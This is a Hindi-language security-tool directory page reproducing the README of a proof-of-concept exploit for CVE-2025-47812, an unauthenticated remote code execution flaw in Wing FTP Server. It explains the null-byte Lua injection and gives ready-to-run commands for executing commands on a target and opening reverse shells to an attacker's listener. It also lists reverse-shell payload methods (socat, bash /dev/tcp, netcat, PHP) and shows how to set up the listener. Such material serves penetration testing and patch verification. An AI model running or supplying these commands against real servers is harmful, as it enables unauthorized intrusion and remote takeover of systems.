Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/havbay/cve-2025-47812-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूल
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Wing FTP सर्वर (CVE-2025-47812) के लिए बिना प्रमाणीकरण के रिमोट कोड निष्पादन शोषण, जिसमें कई रिवर्स शेल पेलोड, इंटरैक्टिव और CLI मोड, और स्वचालित सत्र हैंडलिंग शामिल हैं।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47812 — Wing FTP Server रिमोट कोड निष्पादन (RCE)

Python CVSS Type

अवलोकन

क्षेत्रमान
CVECVE-2025-47812
प्रभावितWing FTP Server < 7.4.4
प्रकारअप्रमाणित रिमोट कोड निष्पादन
CVSS स्कोर10.0 (गंभीर)
सुधार संस्करणWing FTP Server 7.4.4

यह कैसे काम करता है

यह भेद्यता /loginok.html लॉगिन एंडपॉइंट में मौजूद है। सर्वर username फील्ड में नल बाइट्स (%00) को सैनिटाइज़ करने में विफल रहता है। इससे हमलावर सत्र फ़ाइलों में मनमाना Lua कोड इंजेक्ट कर सकता है, जिसका बाद में सर्वर-साइड मूल्यांकन किया जाता है जब /dir.html जैसे एंडपॉइंट एक्सेस किए जाते हैं — बिना किसी प्रमाणीकरण की आवश्यकता के।

संदर्भ: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


विशेषताएँ

  • अप्रमाणित कमांड निष्पादन
  • कई रिवर्स शेल पेलोड (socat, bash, python3, nc-e, nc-fifo, php)
  • Socat पेलोड को पूर्ण इंटरैक्टिव TTY के लिए प्राथमिकता दी गई
  • लक्ष्य पहुँच क्षमता की पूर्व-उड़ान जाँच
  • स्वचालित सत्र UID निष्कर्षण प्रति प्रयास ताज़ा सत्र के साथ
  • --payload फ़्लैग से विशिष्ट पेलोड चुनें
  • -o से कमांड आउटपुट फ़ाइल में सहेजें
  • कॉन्फ़िगरेबल --timeout और --delay
  • -v के साथ वर्बोज़/डीबग मोड
  • सुंदर Ctrl+C हैंडलिंग
  • रिवर्स शेल प्रयासों के बाद पेलोड सारांश
  • CLI आर्गुमेंट मोड + इंटरैक्टिव मेनू
  • रंग-कोडित आउटपुट

आवश्यकताएँ

root@kitploit:~
pip install requests

उपयोग

इंटरैक्टिव मोड

root@kitploit:~
python3 wingftp_rce_exploit.py

CLI मोड

root@kitploit:~
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

सभी विकल्प

root@kitploit:~
-u / --url        लक्ष्य मूल URL
-U / --username   लॉगिन उपयोगकर्ता नाम (डिफ़ॉल्ट: anonymous)
-c / --command    चलाने के लिए कमांड (कमांड मोड)
-r / --rhost      आपका लिसनर IP (रिवर्स शेल मोड)
-p / --rport      आपका लिसनर पोर्ट (रिवर्स शेल मोड)
     --payload    उपयोग करने के लिए विशिष्ट पेलोड (नीचे सूची देखें)
     --timeout    HTTP अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
     --delay      पेलोड प्रयासों के बीच विलंब सेकंड में (डिफ़ॉल्ट: 4)
-o / --output     कमांड आउटपुट फ़ाइल में सहेजें
-v / --verbose    डीबग आउटपुट सक्षम करें

रिवर्स शेल पेलोड

नामविधि
socatsocat के माध्यम से पूर्ण PTY
bash/dev/tcp रिडायरेक्ट
python3सॉकेट सबप्रोसेस
nc-e-e फ़्लैग के साथ Netcat
nc-fifoNetcat + mkfifo
phpPHP fsockopen

उदाहरण

कमांड निष्पादन

root@kitploit:~
लक्ष्य URL : http://192.168.1.10:5466
उपयोगकर्ता नाम   : anonymous
विकल्प     : 1
कमांड    : whoami

रिवर्स शेल

चरण 1 — अपना लिसनर शुरू करें (पूर्ण TTY के लिए socat अनुशंसित):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

या nc के साथ:

root@kitploit:~
nc -lvnp 4444

चरण 2 — एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

श्रेय

  • मूल PoC blindma1den द्वारा
  • सुधार और विस्तार Havbuy द्वारा

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।
उन प्रणालियों के विरुद्ध इसका उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है।
अनधिकृत उपयोग अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।

टूल डाउनलोड करें